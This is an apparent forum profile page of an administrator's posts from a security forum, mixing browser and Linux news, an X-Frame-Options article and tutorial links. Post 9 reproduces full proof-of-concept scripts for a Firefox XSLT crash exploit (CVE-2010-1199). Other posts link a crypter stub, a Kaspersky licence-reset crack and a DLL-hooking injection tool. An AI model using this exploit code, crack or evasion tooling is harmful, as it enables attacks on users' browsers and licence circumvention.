
Nytro (Administrators)
  • Posts: 18712
  • Days Won: 701

Everything posted by Nytro

  1. Nytro

    mozilla bug

    They won't give you any money for a bug. You can report it on Bugzilla so they fix it. They pay for serious security issues, not for every little trifle.
  2. Right now there is a lot of laziness. I have to finish an article first, then I was thinking of doing something for Linux. I wanted to make a Stealer for Linux, but it doesn't fit my ethics.
  3. Metasploit Megaprimer

     Part 1 (Exploitation Basics and need for Metasploit)
     http://securitytube.net/Metasploit-Megaprimer-%28Exploitation-Basics-and-need-for-Metasploit%29-Part-1-video.aspx

     Part 2 (Getting Started with Metasploit)
     http://securitytube.net/Metasploit-Megaprimer-%28Getting-Started-with-Metasploit%29-Part-2-video.aspx

     Part 3 (Meterpreter Basics and using Stdapi)
     http://securitytube.net/Metasploit-Megaprimer-Part-3-%28Meterpreter-Basics-and-using-Stdapi%29-video.aspx

     Part 4 (Meterpreter Extensions Stdapi and Priv)
     http://securitytube.net/Metasploit-Megaprimer-Part-4-%28Meterpreter-Extensions-Stdapi-and-Priv%29-video.aspx

     Part 5 (Understanding Windows Tokens and Meterpreter Incognito)
     http://securitytube.net/Metasploit-Megaprimer-Part-5-%28Understanding-Windows-Tokens-and-Meterpreter-Incognito%29-video.aspx

     Part 6 (Espia and Sniffer Extensions with Meterpreter Scripts)
     http://securitytube.net/Metasploit-Megaprimer-Part-6-%28Espia-and-Sniffer-Extensions-with-Meterpreter-Scripts%29-video.aspx

     Part 7 (Metasploit Database Integration and Automating Exploitation)
     http://securitytube.net/Metasploit-Megaprimer-Part-7-%28Metasploit-Database-Integration-and-Automating-Exploitation%29-video.aspx

     Part 8 (Post Exploitation Kung Fu)
     http://securitytube.net/Metasploit-Megaprimer-Part-8-%28Post-Exploitation-Kung-Fu%29-video.aspx

     Part 9 (Post Exploitation Privilege Escalation)
     http://securitytube.net/Metasploit-Megaprimer-Part-9-%28Post-Exploitation-Privilege-Escalation%29-video.aspx

     Part 10 (Post Exploitation Log Deletion and AV Killing)
     http://securitytube.net/Metasploit-Megaprimer-Part-10-%28Post-Exploitation-Log-Deletion-and-AV-Killing%29-video.aspx
  4. It's no good, it's about 2 years old I think, most of them detect it, I think 80%. Anyway, I think it wouldn't be very hard to make it FUD; the PE Loader is in an ActiveX which I don't think is too detectable. But I'm not dealing with that kind of thing at the moment.
  5. Someone (dragon, thanks) posted it on ISR; I don't know exactly what it's about, I only saw that it uses one of my stubs (from Royal Crypter v1.0).

     Screenshot: http://i54.tinypic.com/xfzx1x.png
     Download: http://www.multiupload.com/F07DE06966

     How to modify a stub. Someone who knows assembly should tell us more.
  6. The X-Frame-Options response header

     A precautionary measure against clickjacking.
     Source: https://developer.mozilla.org/en/The_X-FRAME-OPTIONS_response_header

     Introduced in Gecko 1.9.2.9 (Firefox 3.6.9)

     The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.

     Using X-Frame-Options

     There are two possible values for X-Frame-Options:

     DENY
         The page cannot be displayed in a frame, regardless of the site attempting to do so.
     SAMEORIGIN
         The page can only be displayed in a frame on the same origin as the page itself.

     In other words, if you specify DENY, not only will attempts to load the page in a frame fail when loaded from other sites, attempts to do so will fail when loaded from the same site. On the other hand, if you specify SAMEORIGIN, you can still use the page in a frame as long as the site including it in a frame is the same as the one serving the page.

     Results

     When an attempt is made to load content into a frame, and permission is denied by the X-Frame-Options header, Firefox currently renders about:blank into the frame. At some point, an error message of some kind will be displayed in the frame instead.

     Browser compatibility

     | Browser           | Lowest version  |
     |-------------------|-----------------|
     | Internet Explorer | 8.0             |
     | Firefox (Gecko)   | 3.6.9 (1.9.2.9) |
     | Opera             | 10.50           |
     | Safari            | 4.0             |
     | Chrome            | 4.1.249.1042    |

     Worth a look, interesting: http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx
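An added example, not part of the original post or of the MDN article: a small Python model of the DENY / SAMEORIGIN decision described above, together with an audit of a raw response head. The function names, origins and sample responses are constructed for illustration, and treating a repeated or unrecognised value as "no protection" is this example's own conservative assumption for audit purposes.

```python
"""X-Frame-Options: audit a response head and model the framing decision.

Added illustration; all names and sample data below are constructed.
"""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed sample responses (status line + headers only).
RESP_DENY = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nX-Frame-Options: DENY\r\n\r\n"
RESP_SAME = "HTTP/1.1 200 OK\r\nx-frame-options: sameorigin\r\n\r\n"
RESP_NONE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
RESP_TYPO = "HTTP/1.1 200 OK\r\nX-Frame-Options: SAME-ORIGIN\r\n\r\n"
RESP_BOTH = ("HTTP/1.1 200 OK\r\nX-Frame-Options: DENY\r\n"
             "X-Frame-Options: SAMEORIGIN\r\n\r\n")


def origin(url):
    """Return the (scheme, host, port) tuple that defines a URL's origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port or DEFAULT_PORTS.get(scheme)
    return (scheme, (parts.hostname or "").lower(), port)


def xfo_values(raw_response):
    """Collect every X-Frame-Options value found in a raw response head."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:           # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "x-frame-options":
            values.append(value.strip().upper())  # names and values: case-insensitive
    return values


def audit(raw_response):
    """Classify the header as 'deny', 'sameorigin', 'missing' or 'invalid'."""
    distinct = set(xfo_values(raw_response))
    if not distinct:
        return "missing"
    if distinct == {"DENY"}:
        return "deny"
    if distinct == {"SAMEORIGIN"}:
        return "sameorigin"
    # Misspelt or conflicting values: flag for review (assumption of this example).
    return "invalid"


def may_render_in_frame(raw_response, page_url, framing_url):
    """Apply the two rules from the text to one framing attempt."""
    policy = audit(raw_response)
    if policy == "deny":
        return False                               # never framed, even by its own site
    if policy == "sameorigin":
        return origin(page_url) == origin(framing_url)
    return True                                    # missing/invalid: nothing blocks framing


if __name__ == "__main__":
    page = "https://bank.example/pay"
    for label, resp in [("DENY", RESP_DENY), ("SAMEORIGIN", RESP_SAME),
                        ("none", RESP_NONE), ("typo", RESP_TYPO)]:
        for framer in ("https://bank.example/home", "https://other.example/"):
            print(label, framer, audit(resp), may_render_in_frame(resp, page, framer))
```

Running the audit over responses from every route that renders sensitive UI shows which pages are still frameable because the header is absent or misspelt.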
  7. 0-day vulnerability in Adobe Reader – digitally signed exploit

     by Bogdan Condurache, September 9

     A new vulnerability has been discovered in Adobe Reader and Acrobat. As Roel, an expert at Kaspersky Lab, informs us, this vulnerability is being heavily exploited. One of the things that draws attention is the ROP programming technique, which allows it to get past the ASLR and DEP protections in Windows Vista and Seven.

     Most vulnerabilities in PDF files allow malicious content to be downloaded. This time the PDF file itself contains the malicious code. It creates an executable file in the %temp% directory, which it then tries to execute.

     What is even more interesting is that the file has a digital signature valid until October 29 of this year. The digital signature belongs to a credit union in the United States and is signed by VeriSign.

     This is not the first time malware authors have used stolen digital signatures to sign exploits. Just remember Stuxnet. Let's hope that Stuxnet did not mark "a new trend" and that the digital signing of malware will stop.

     You can replace Adobe Reader with PDF X-Change Viewer, Foxit PDF Reader or Sumatra. All of these are free software, the last one being open source.

     References: http://www.securelist.com/en/blog/2287/Adobe_Reader_zero_day_attack_now_with_stolen_certificate

     Source: 0-day vulnerability in Adobe Reader - digitally signed exploit | WorldIT
  8. KASPERSKY PURE
     Kaspersky PURE is superior to any ordinary PC protection solution. This product gives your PC immunity against cyber threats of any kind. Kaspersky PURE protects the integrity and confidentiality of all your digital assets. Kaspersky PURE keeps your PC clean and gives you the peace of mind you need.
     Trial: http://trial.bestantivirus.ro/home_user/0_kpure/kaspersky_pure.zip

     KASPERSKY INTERNET SECURITY 2011
     This solution from Kaspersky Lab combines antivirus protection with a personal firewall and an anti-spam filter. Kaspersky Internet Security protects your PC against spam, dangerous programs such as adware, spyware and dialers, as well as network attacks.
     Trial: http://trial.bestantivirus.ro/home_user/1_kis_2011/kaspersky_internet_security_2011.zip

     KASPERSKY ANTI-VIRUS 2011
     Kaspersky Anti-Virus, the core of your PC's security system, provides protection against a wide range of computer threats and gives you the basic tools needed to protect your PC.
     Trial: http://trial.bestantivirus.ro/home_user/2_kav_2011/kaspersky_anti-virus_2011.zip

     KASPERSKY ANTI-VIRUS FOR MAC
     Compatible with Mac OS 10.6 Snow Leopard! Kaspersky Anti-Virus for Mac offers advanced protection for your Mac, with an interface familiar to users of this operating system and using award-winning, patented Kaspersky Lab technologies.
     Trial: http://trial.bestantivirus.ro/home_user/5_kav_for_mac/kaspersky_anti-virus_for_mac.zip

     KASPERSKY MOBILE SECURITY 9
     You make calls, send text messages, browse the Internet and communicate through social networks every day. Your smartphone is an important part of your life. Kaspersky Mobile Security keeps your data yours alone.
     Trial: http://trial.bestantivirus.ro/home_user/6_kms_9/kaspersky_mobile_security_9.zip

     KASPERSKY PASSWORD MANAGER
     Kaspersky Password Manager is an indispensable utility for the active Internet user. It fully automates entering passwords and other data into websites and saves you the effort of creating and remembering multiple passwords.
     Trial: http://trial.bestantivirus.ro/home_user/8_kpm/kaspersky_password_manager.zip

     KASPERSKY KRYPTOSTORAGE
     Kaspersky KryptoStorage securely protects your personal files against unauthorized access and data theft using state-of-the-art transparent encryption technology, and allows permanent deletion of files from the computer.
     Trial: http://trial.bestantivirus.ro/home_user/7_kks/kaspersky_kryptostorage.zip

     Or, preferably, download from here: http://www.kaspersky.com/trials

     And I also found this (I haven't tested it, I don't know if it's infected...):

     This is the FINAL version of KTR911, you can reset your Kaspersky 2011/ Kaspersky 2010/ Kaspersky PURE anytime you want, even if your Kaspersky license is still valid, then you'll get a fresh new license from Kaspersky Lab.

     Download: http://hotfile.com/dl/68124248/d1a2334/KTR.9.11.rar.html
     Or: http://uploading.com/files/13e485dc/KTR.9.11.rar/
  9. Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

    ```python
    '''
      __  __  ____         _    _ ____
     |  \/  |/ __ \   /\  | |  | |  _ \
     | \  / | |  | | /  \ | |  | | |_) |
     | |\/| | |  | |/ /\ \| |  | |  _ <   Day 9 (Binary Analysis)
     | |  | | |__| / ____ \ |__| | |_) |
     |_|  |_|\____/_/    \_\____/|____/

     http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/
     http://www.exploit-db.com/sploits/moaub-day9-ba.zip
    '''

    '''
     Title    : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability
     Version  : Firefox 3.6.3
     Analysis : http://www.abysssec.com
     Vendor   : http://www.mozilla.com
     Impact   : High/Critical
     Contact  : shahin [at] abysssec.com , info [at] abysssec.com
     Twitter  : @abysssec
     CVE      : CVE-2010-1199
    '''
    import sys;

    # Build the stylesheet: one <xsl:for-each> carrying a very large number of <xsl:sort> keys.
    myStyle = """<?xml version="1.0"?>
    <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:output method="html"/>
    <xsl:template match="/">
    <html>
    <head>
    <title>Beatles</title>
    </head>
    <body>
    <table border="1">
    <xsl:for-each select="beatles/beatle">
    """
    BlockCount = 43000
    count = 1
    while(count<BlockCount):
        myStyle = myStyle + "<xsl:sort select='name/abysssec"+str(count)+"' order='descending'/>\n"
        count = count + 1

    myStyle = myStyle +"""
    <tr>
    <td><a href="{@link}"><xsl:value-of select="name/lastname"/></a></td>
    <td><a href="{@link}"><xsl:value-of select="name/firstname"/></a></td>
    </tr>
    </xsl:for-each>
    </table>
    </body>
    </html>
    </xsl:template>
    </xsl:stylesheet>
    """
    cssFile = open("abysssec.xsl","w")
    cssFile.write(myStyle)
    cssFile.close()
    ```

    ```python
    '''
      __  __  ____         _    _ ____
     |  \/  |/ __ \   /\  | |  | |  _ \
     | \  / | |  | | /  \ | |  | | |_) |
     | |\/| | |  | |/ /\ \| |  | |  _ <
     | |  | | |__| / ____ \ |__| | |_) |
     |_|  |_|\____/_/    \_\____/|____/
    '''

    '''
     Title        : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability
     Version      : Firefox 3.6.3
     Analysis     : http://www.abysssec.com
     Vendor       : http://www.mozilla.com
     Impact       : High/Critical
     Contact      : shahin [at] abysssec.com , info [at] abysssec.com
     Twitter      : @abysssec
     CVE          : CVE-2010-1199
     MOAUB Number : MOAU_09_BA
    '''
    import sys;

    # Build the XML document that references abysssec.xsl as its stylesheet.
    myStyle = """<?xml version="1.0"?>
    <?xml-stylesheet href="abysssec.xsl" type="text/xsl"?>
    <beatles>
    """
    block = """
    <beatle link="http://www.johnlennon.com">
    <name>
    """
    BlockCount = 2147483647
    rowCount=10
    #myStyle = myStyle + "<tree id='mytree' flex='1' rows='"+str(rowCount)+"'>\n"
    count = 1
    # As posted, count only decreases, so this loop never reaches BlockCount.
    while(count<BlockCount):
        myStyle = myStyle + """
        <beatle link="http://www.johnlennon.com">
        <name>
        """
        myStyle = myStyle + " <firstname>"+"A"*rowCount+"</firstname>\n"
        myStyle = myStyle + """
        <lastname>Lennon</lastname>
        </name>
        </beatle>
        <beatle link="http://www.paulmccartney.com">
        <name>"""
        myStyle = myStyle + " <firstname>"+"B"*rowCount+"</firstname>\n"
        myStyle = myStyle + """
        <lastname>McCartney</lastname>
        </name>
        </beatle>
        <beatle link="http://www.georgeharrison.com">
        <name>
        """
        myStyle = myStyle + " <firstname>"+"C"*rowCount+"</firstname>\n"
        myStyle = myStyle + """
        <lastname>Harrison</lastname>
        </name>
        </beatle>
        <beatle link="http://www.ringostarr.com">
        <name>
        """
        myStyle = myStyle + " <firstname>"+"D"*rowCount+"</firstname>\n"
        myStyle = myStyle + """
        <lastname>Starr</lastname>
        </name>
        </beatle>
        <beatle link="http://www.webucator.com" real="no">
        <name>
        """
        myStyle = myStyle + " <firstname>"+"E"*rowCount+"</firstname>\n"
        myStyle = myStyle +"""
        <lastname>Dunn</lastname>
        </name>
        </beatle>
        """
        count = count - 1

    myStyle = myStyle +"""
    </beatles>
    """
    cssFile = open("abyssssec.xml","w")
    cssFile.write(myStyle)
    cssFile.close()
    ```

    Source: MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

    First of all, I don't see where the Remote Code Execution is. Maybe DoS, that yes. Then the .xsl: it doesn't open it for me, instead I get prompted to download it; probably a suitable Content-Type is needed, but I won't bother testing. Another thing that seems odd to me is that it doesn't kill both processors (cores) simultaneously, but "takes advantage" of them in turn. When one is at 100%, the other is at a low level, and vice versa. I like that.

    Screenshot: http://i51.tinypic.com/23vzw60.png
  10. Firefox Updated

      There's a video there. An example, with and without hardware acceleration.
  11. Google Chrome vs. Firefox – which is better at hardware acceleration?

      08 September 2010 | 15:05
      Liviu Mihai

      The newest front in the browser war is hardware acceleration. This technology, as some of you already know, allows the browser to use the processing power of the video card alongside the system processor.

      At present, web browsers are only beginning to show us the potential of hardware acceleration. Tests are being run and experiments made. Chrome and Firefox are the browsers that currently support hardware acceleration in a form users can actually use. Internet Explorer 9 also promises efficient acceleration but, for now, it is not available for download.

      For these reasons, we can test hardware acceleration only in Chrome and Firefox. You need Google Chrome 7 dev (or Chromium) and you need to enable hardware acceleration in this way. For Firefox, you need to have installed the version released today, beta 5 of version 4, which can be downloaded from here. In Firefox, hardware acceleration is already enabled by default.

      The test

      Ironically, I tested the hardware acceleration potential of Firefox and Google Chrome using the tests created by Microsoft to show us how good Internet Explorer 9 is. As IE9 is not yet available, not even as a beta, testing it remains for another time.

      The test drive created by Microsoft can be accessed at this address. Three categories of tests are available: speed, HTML5 and graphics. As hardware acceleration aims to increase browser speed, I chose a speed test. More precisely, the one called FishIE Tank.

      The results

      The test was performed with the browser windows maximized, with 250 fish. The results were as follows:

      Firefox (resolution 1215 x 694 pixels): on average 40 FPS (frames per second) - approximately 27% processor load
      Chrome (resolution 1215 x 739 pixels): on average 5 FPS - approximately 50% processor load

      It can be seen that Firefox 4 beta 5, with a processor load half that of Google Chrome 7 dev, achieved a performance 8 times better. Also keep in mind that Google Chrome's resolution was slightly higher (it depends on the interface customization).

      So Firefox manages to redirect the processing effort to the video card more efficiently. Consequently, both the processor load and the rendering speed were far superior.

      As I said, both browsers are only beginning to "play" with hardware acceleration. This is not a test that highlights a clear result. It is a temporary situation, which can change quickly. In addition, it remains to be seen how Internet Explorer 9 and Opera will behave when they introduce this feature.

      Until then, this test highlights one more reason, along with others such as the Panorama feature, why Firefox 4 will be an important upgrade.
  12. I don't think it will be bigger. The browser will be the same, meaning it will have to offer the same support, for all the HTML5 nonsense for example. If extra code is needed, they should make some kind of module, to be loaded only when necessary.
  13. Firefox 4 Set to Improve Security

      September 8, 2010
      By Sean Michael Kerner

      The race to accelerate browser features continues as Mozilla developers race towards the finish line to get the finished version of the Firefox 4 Web browser out the door. The first Firefox 4 beta was released in early July of this year and the final release is due by the end of the year. Along the way to its final generally available release, Mozilla developers have been issuing milestone releases with new features and bug fixes.

      Firefox 4 development is occurring at a time when rival browser vendor Google (NASDAQ: GOOG) is updating its Chrome browser to version 6 and Microsoft is working on Internet Explorer 9.

      Firefox 4 Beta 5 is set to debut this week providing testers with new hardware accelerated graphics capabilities and an implementation of the IETF HTTP Strict Transport Security (HSTS) draft standard.

      "A while ago, we talked about Force-TLS that lets sites say 'hey, only access me over HTTPS in the future' and the browser listens," Mozilla developer Sid Stamm blogged. "Well, this idea has been solidified into a draft spec for HTTP Strict Transport Security (HSTS) and we've landed support for it into our source tree. This means that HSTS will be shipped with Firefox 4, and will be deployed as soon as the next beta release."

      The HSTS specification will enable site owners to ensure that browsers visit the SSL secured version of a website instead of going through an unencrypted non-SSL HTTP address first. SSL secured sites help to ensure that password, login and other sensitive information is encrypted.

      "If Firefox knows your host is an HSTS one, it will automatically establish a secure connection to your server without even trying an insecure one," Stamm blogged. "This way, if I am surfing the 'net in my favorite cafe and a hacker is playing MITM with paypal.com (intercepting http requests for paypal.com and then forwarding them on to the real site), either I'll thwart the attacker by getting an encrypted connection to paypal.com immediately, or the attack will be detected by HSTS and the connection won't work at all."

      What will Firefox 4 Include – and leave out?

      While the Beta 5 release includes new features, the final feature freeze for Firefox 4 is likely coming soon. A number of features that were originally set for inclusion in Firefox 4 have already been dropped, including a new Account Manager tool.

      On Mozilla's platform wiki, the open source organization has also noted in its latest meeting notes that the new Windows silent updating feature may be at risk of being dropped from the final release. The silent update feature is one that is intended to run in the background and update the Firefox browser as new security releases come out.

      With Beta 5 out the door, Mozilla developers are turning their attention to Beta 6, which is currently scheduled for a code freeze on Friday September 10th. During a conference call on Tuesday, Mozilla's director of Firefox, Mike Beltzner, noted that there are currently 114 blockers (items still to be fixed and/or completed) and as such he's not sure that the September 10th date for a Beta 6 code freeze will be achievable.

      "I would also like to avoid a repeat of landing particularly risky changes right before a code freeze, which is what happened with Beta 5," Beltzner said. "As a result, Beta 5 will ship with some drawing regressions, especially on Mac."
  14. Mozilla Labs Launches Gaming Initiative

      Sep 08, 2010

      Platform based on open Web technologies.

      Mozilla Labs announced its newest initiative, a gaming platform appropriately named Mozilla Labs: Gaming. The goal of the platform is to create browser-based games built on Open Web standards.

      "We invite the wider community to play with cool, new tech and aim to help establish the Open Web as the platform for gaming across all your Internet connected devices," Pascal Finette from Mozilla Labs said.

      Some of the technologies Mozilla Labs Gaming utilizes include WebGL, touch controls, geolocation, JavaScript, and open video and audio. Games built on HTML5 are available freely on sites like HTML5games.com, but Mozilla's new initiative looks to advance games.

      Mozilla Labs Gaming is also launching an international gaming competition to drive developer interest to the burgeoning platform. Aptly titled Game_On 2010, the competition will open at the end of September.

      (Trevan McGee)
  15. Sean Michael Kerner
      Wednesday, September 8, 2010 11:14:55 AM

      Recent years have seen the Ubuntu Linux distribution, led by Canonical, experiencing rapid growth in both users and features. With the upcoming Ubuntu 10.10 Maverick Meerkat release, set for October, Ubuntu developers will continue to push the boundaries further of both server and desktop Linux.

      Sitting at the upper rung of Ubuntu's engineering efforts is Matt Zimmerman, Canonical's CTO, who helps to lead Ubuntu's technical direction. That's no small feat: Keeping the project and its developers organized is a mammoth undertaking, requiring the daily coordination of activities across the globe. But as Zimmerman describes it, he has the tools and processes in place to keep the Ubuntu project running strong.

      One way that Zimmerman keeps the project on track is ensuring close communication among members of his team, a disparate organization that mirrors how the Ubuntu community itself builds and develops its Linux distribution. For one thing, while Canonical has offices in multiple countries, most of Zimmerman's engineers aren't located in those offices.

      "My team is about 120 people and I think we have less than five people who are in offices," Zimmerman told InternetNews.com.

      While Zimmerman noted that he does get together face-to-face fairly regularly with his staff once a quarter, facilitating regular interaction requires a long list of common tools. For instance, Zimmerman said that Canonical engineers do a lot of work through IRC, wikis and teleconferences. The team also uses the open source Gobby tool for collaborative editing and Mumble for voice chatrooms.

      "Mumble is sort of like IRC for voice," Zimmerman said. "You have a set of channels and then people come and go from one channel to another and whatever channel you're in, there is live voice between the people that are in the room."

      Engineering organizations are often big users of whiteboards to build and share ideas, and Ubuntu is no exception. While his staff and contributors are distributed, Zimmerman said that they do rely on some desktop and screen-sharing, though he added that there isn't a one-to-one whiteboard substitute.

      For overall project and goal management, Canonical is using its own Launchpad platform.

      "Launchpad provides some basic project management support," Zimmerman said. "We've developed other tools around that for tracking."

      Zimmerman described the project's overall management as using a blueprint -- a project plan on which individual tasks are broken out. Canonical also has a tool that extracts data out of Launchpad and does reporting. One of the key reporting elements used by Zimmerman is a burn-down chart, an important element of the Scrum agile software development methodology.

      "It's basically a bar chart that shows you how much work you have remaining to do in your iteration," Zimmerman said. "So if you start off with, say, 200 tasks, you then draw it down to zero and you track it as you go if you're above or below the trend line."

      Though Zimmerman is using a Scrum-style burn-down chart to track project progress, he added that he isn't strictly adhering to any one particular development methodology.

      "We're using bits and pieces of different methodologies," Zimmerman said. "We use some components from Extreme Programming (XP), Scrum, and others. Different engineering teams have different requirements so we're experimenting with different approaches."

      From an accounting perspective, however, Zimmerman noted that by using elements of the Scrum approach, he is able to report on the output capacity of his team.

      "So we know in this amount of time how much we are able to get done and that enables more accurate forecasting," Zimmerman said.

      From a testing perspective, the Ubuntu engineering organization has multiple efforts underway. Zimmerman explained that hardware certification testing occurs in a hardware lab where daily, automated compatibility testing occurs. There are also automated functional tests to ensure that users can upgrade cleanly from one release to another. Then there is also manual testing, which is crowdsourced by the Ubuntu community.

      Ubuntu developers don't operate in a vacuum and are part of the broader upstream open source ecosystem. As a result, patches and contributions are made upstream by Zimmerman's team in an ongoing process. Sometimes, Ubuntu will have patches that have not yet been merged upstream.

      "We do carry patches on top of upstream, but we have to in order to meet our deadlines," Zimmerman said. "Our goal is to keep the delta as small as we can. Every release cycle, we spend a good amount of our engineering time bringing our patch set forward."

      Ubuntu also relies heavily on its relationship with the Debian Linux distribution, and Zimmerman noted that the vast majority of Ubuntu patches submitted to Debian are accepted. He added that with other upstream projects, where Ubuntu doesn't do as much work, there can be challenges.

      "It's tough since we have to work across so many different projects with Ubuntu," Zimmerman said. "We can't have a close personal relationship with everyone in the open source community, but at the same time, we've got to be able to work together."
  16. Another ban. Lots of losers around here. One file closed immediately after running, hid hidden files and blocked Task Manager. I didn't bother checking further.
  17. Greerasu can't come, he's not in Romania. Send me your ID by PM.
  18. Drop the compliments. So, who's from VL and buying drinks?
  19. It doesn't run in a virtual machine, it closes immediately when run, so ban.
  20. I also got the update for this from OpenSUSE. The advantage of open source... And I got several security updates for the kernel, so update.
  21. It's from the rewrite; 1337 is the ID of that topic.
  22. Are you buying drinks? 2-3 beers or so.
  23. dwtf v1.0 and its Features

      dwtf creates a fake.dll from real.dll

      Features:
      1- It exports all symbols of real.dll (also Forwarder).
      2- It imports all exports of real.dll (also Forwarder).
      3- It creates a code area with a JMP DWORD [ADDRESS] for each export.
      4- The exports of the fake dll are assigned to a JMP area which jumps to the original export of real.dll.

      Working of dwtf v1.0

      If you are doing PEB HOOKING, when the APP calls a fake dll export it jumps to the original export, and everything works fine:

      Before PEB HOOKING: APP -> IAT OF APP -> REAL DLL EXPORT
      After PEB HOOKING: APP -> IAT OF APP -> FAKE DLL EXPORT -> IAT OF FAKE DLL -> REAL DLL EXPORT

      You can add or remove payloads with any IAT HOOKING in the IAT of the fake dll:

      APP -> IAT OF APP -> FAKE DLL EXPORT -> IAT OF FAKE DLL -> PAYLOAD STACK -> (or never) REAL DLL EXPORT

      Syntax: dwtf.exe fake_dll real_dll
      Example: dwtf.exe k32.dll c:\windows\system32\kernel32.dll

      All .exes are in the bin folder. You can execute:

      Generate fake kernel32.bat

      This bat executes dwtf, creating a fake kernel32.dll called k32.dll from c:\windows\system32\kernel32.dll

      After that, you can do the PEB hooking by executing:

      PEB hooking poc with fake kernel32.bat

      IMPORTANT: You need NETCAT to send commands to the console.

      This bat injects a console.dll into the poc.exe process using InjectorDll.exe. This console listens by default on 127.0.0.1 1234. This console is the interface for doing PEB Hooking. Next, the bat connects to 127.0.0.1 1234 using the nc command (netcat).

      In the console with netcat you can write:

      pebhook kernel32.dll k32.dll
      resume
      exit

      At this moment poc.exe is running and waiting for the user to press enter. poc.exe tries to create files with two APIs of kernel32.dll: CreateFileW and CreateFileA. When you press enter all works fine (good luck) and the process exits, creating the files.

      In this scenario everything works this way:

      poc.exe -> IAT of POC.EXE -> k32.dll (fake kernel32.dll) -> IAT of k32.dll -> kernel32.dll

      Loading payloads dynamically

      For this scenario:

      poc.exe -> IAT of POC.EXE -> k32.dll (fake kernel32.dll) -> IAT of k32.dll -> payload/s

      Remember: You can add a payload stack with IAT HOOKING over IAT HOOKING ... The payloads can call the original kernel32.dll export.

      You need:

      Generate fake kernel32.bat
      PEB hooking poc with fake kernel32.bat
      command: pebhook kernel32.dll k32.dll

      Add a payload for CreateFileW, inserting an IAT hook in k32.dll.

      Inject the dll:

      InjectorDll.exe poc_dll.dll -p PID_OF_POC_EXE

      In POC.EXE you can see:

      Creating files... press enter
      DLL INJECTED! ADDR OF OwnCreateFileA: 0x70651030 < --- For EXAMPLE

      It is time for the IAT hooking of CreateFileA of k32.dll to OwnCreateFileA of poc_dll.dll.

      Example of searching for the CreateFileA IAT ADDR in k32, using peview (google: download peview):

      Search the ordinal of CreateFileA like this image:
      Search IAT ADDR in k32 of CreateFileA like this image:

      In the IMAGE the IAT ADDR is: 0x1000C1A6

      Change the IAT to the payload addr:

      write_process_memory.exe PID_OF_POC_EXE 0x1000C1A6 0x70651030

      0x70651030 is the addr of OwnCreateFileA of poc_dll.dll injected in POC.exe

      In the console with netcat you can write:

      resume
      exit

      Credits

      dwtf 1.0 (MIT License) engine by Dreg, from evil fingers:
      - making FULL dll (PEB/file) hooking more easy...
      - Greetz: Lacon 2k9 Spain & Hispasec team.
      - Note: Use with real DLLs, a lot of bugs in this version, contact me: dreg@fr33project.org

      Video: http://www.youtube.com/watch?v=t7UXEJieliM
      Download: http://rootkitanalytics.com/downloadCounter.php?id=7
  24. SpyDLLRemover v3

      SpyDLLRemover is a standalone tool to effectively detect and delete spyware from the system. It comes with an advanced spyware scanner which quickly discovers hidden Rootkit processes as well as suspicious/injected DLLs within all running processes. It not only performs sophisticated auto analysis on process DLLs but also displays them with various threat levels, which greatly helps in quick identification of malicious DLLs. The DLL search feature helps in finding a DLL within all running processes using just a partial or full name. The user can then choose to remove the DLL from a single process or from all loaded processes with just one click.

      One of the unique features of SpyDLLRemover is its capability to free the DLL from a remote process using an advanced DLL injection method which can defeat any existing Rootkit tricks. It also uses sophisticated low level anti-rootkit techniques to uncover hidden userland Rootkit processes as well as to terminate them.

      SpyDLLRemover comes with support for Microsoft's latest operating system, Windows 7. Apart from this, it introduces a new 'Scan Settings' option to allow the user to fine tune the scanning operation. It also features improved heuristic analysis, an enriched user interface, Intelli-Refresh of 'Process Viewer' and more. The current version provides support for malicious DLL removal from system processes across session boundaries, breaking the limitations imposed in Vista/Win7.

      Features of SpyDLLRemover v3

      Here are some of the prominent and unique features of SpyDLLRemover which set it apart from any other tool of its kind.

      * Advanced Spyware Scanner which efficiently discovers hidden Rootkit processes as well as suspicious/injected DLLs within all running processes in the system.
      * Detection and removal of hidden userland Rootkit processes using sophisticated techniques such as
        - Direct NT System Call Implementation
        - Process ID Bruteforce Method (PIDB) as first used by BlackLight
        - CSRSS Process Handle Enumeration Method
      * State of the art technique for completely freeing the injected DLL from a remote process, based on an advanced DLL injection method using a low level implementation which defeats any blocking attempts by Rootkits. This is one of those unique features found only in SpyDLLRemover.
      * Sophisticated DLL auto analysis which helps in separating out the legitimate modules/DLLs from the malicious ones. Such DLLs are displayed using different colors representing various threat levels for quicker and easier identification.
      * 'Scan Settings' option to fine tune the scanning operation based on user needs.
      * Intelli-Refresh of 'Process Viewer' leading to a flicker free user experience.
      * Integrated online verification mechanism through ProcessLibrary.com to validate any suspicious DLLs. This makes it easy to differentiate between spyware and legitimate DLLs.
      * DLL Tracer feature to search for a DLL within the running processes using a partial or full name. The user can then choose to remove the DLL from a single process or from all loaded processes with just one click.
      * Sort the process/DLL in the list based on various parameters for easier and quicker analysis.
      * Detailed report generation of the Spyware scanning result as well as the process/DLL list in standard HTML format for offline investigation.
      * View the process/DLL properties for more information by just double clicking on the process/DLL entry in the list.
      * Feature to show all running processes in the system which have loaded the selected DLL. The user can also click on the 'Remove DLL from ALL' button to quickly remove any such malicious DLL from all loaded processes.
      * Termination of a suspicious or hidden process based on a low level implementation which makes it very effective against any Rootkit techniques.
      * Support for malicious DLL removal from system processes across session boundaries, breaking the limitations imposed in Vista/Win7.
      * Displays detailed information about all running processes on the system
        - Process name
        - Process Id
        - Session Id
        - Company Name
        - Product Name
        - Process Description
        - Memory Utilization
        - Process Binary Path
        - Process File Size
        - File Install Date
